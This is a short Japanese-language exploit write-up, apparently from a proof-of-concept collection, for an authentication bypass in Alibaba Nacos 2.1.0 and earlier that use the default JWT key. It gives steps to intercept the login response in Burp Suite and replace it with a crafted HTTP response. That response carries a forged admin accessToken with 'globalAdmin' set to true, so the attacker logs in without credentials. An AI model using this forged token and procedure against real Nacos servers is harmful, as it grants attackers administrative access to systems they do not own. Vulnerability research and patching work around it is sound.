
Alibab Nacos Unauthorized Login
Nacos <= 2.1.0 に影響を与える問題が発見されました。Nacos ユーザーがデフォルトの JWT キーを使用すると、不正アクセス脆弱性が発生します。この脆弱性により、攻撃者はユーザー名とパスワードの認証をバイパスし、Nacos ユーザーに直接ログインできます。
Nacos <= 2.1.0 バージョン
ステップ 1:Nacos の Web サイトに直接アクセスし、任意のユーザー名とパスワードを入力し、Burpsuite を使用してパケットをキャプチャします。

ステップ 2:レスポンスパケットをインターセプトします。

ステップ 3: データパケットを次のように変更します
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

ステップ 4: データパケットをリリースした後、正常にログインします。
